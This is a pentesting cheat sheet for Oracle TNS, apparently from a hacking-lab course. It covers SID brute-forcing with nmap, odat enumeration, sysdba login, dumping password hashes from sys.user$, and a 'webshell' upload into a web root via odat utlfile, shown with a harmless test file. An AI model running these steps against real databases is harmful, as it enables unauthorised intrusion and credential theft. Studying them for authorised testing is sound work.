Oracle TNS (1521)

# Oracle TNS Introduction - Oracle TNS (transparent network substrate) is a comm protocol that facilitates comms between Oracle dbs and apps over the network - supports IPv6, SSL/TLS encryption ## Footprinting Oracle TNS ```bash sudo nmap -p1521 -sV <ip_addr> --open #typically reveals SID for db instance sudo nmap -p1521 -sV <ip_addr> --open --script oracle-sid-brute #brute force SID #install odat to further enumerate Oracle db sudo apt install -y odat odat -h #test odat odat all -s <ip_addr> # emumerate Oracle db and its components ``` ```bash #install sqlplus for interacting with Oracle db sudo apt install -q oracle-instantclient-sqlplus sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig #run below command if error occurs with loading libraries #login to Oracle db sqlplus <user_name>/<password>@<ip_addr>/XE sqlplus <user_name>/<password>@<ip_addr>/XE as sysdba #login as db admin #interact with Oracle db SQL> select table_name from all_tables; # list available tables SQL> select * from user_role_privs; #show privs for current user SQL> select name, password from sys.user$; #retreive name-password columns from sys.user$ table ``` ## Upload file (webshell) to Webserver using Oracle DB ```bash echo "Oracle File Upload Test" > testing.txt #for Linux host: place file in /var/www/html #for Windows host: place file in C:\inetpub\wwwroot ./odat.py utlfile -s <ip_addr> -d XE -U <user_name> -P <password> --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt #test to see if file was uploaded properly curl -X GET http://<ip_addr>/testing.txt ``` ## TNS Config Files - each db or service has a unique `tnsname.ora` file with necessary info for clients to connect - resolves service names to network addreses - each service also has a `listener.ora` file that defines the server-side listener process's properties and parameters - determines the service the listener should listen to and associated behavior - `PlsqlExclusionList` protects the Oracle db by specifying the name of PL/SQL packages or types that should be excluded from execution - located in `$ORACLE_HOME/sqldeveloper` ```txt #tnsnames.ora file ORCL = (DESCRIPTION = (ADDRESS_LIST = (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521)) ) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = orcl) ) ) ``` ```txt #listener.ora file SID_LIST_LISTENER = (SID_LIST = (SID_DESC = (SID_NAME = PDB1) (ORACLE_HOME = C:\oracle\product\19.0.0\dbhome_1) (GLOBAL_DBNAME = PDB1) (SID_DIRECTORY_LIST = (SID_DIRECTORY = (DIRECTORY_TYPE = TNS_ADMIN) (DIRECTORY = C:\oracle\product\19.0.0\dbhome_1\network\admin) ) ) ) ) LISTENER = (DESCRIPTION_LIST = (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = orcl.inlanefreight.htb)(PORT = 1521)) (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521)) ) ) ADR_BASE_LISTENER = C:\oracle ```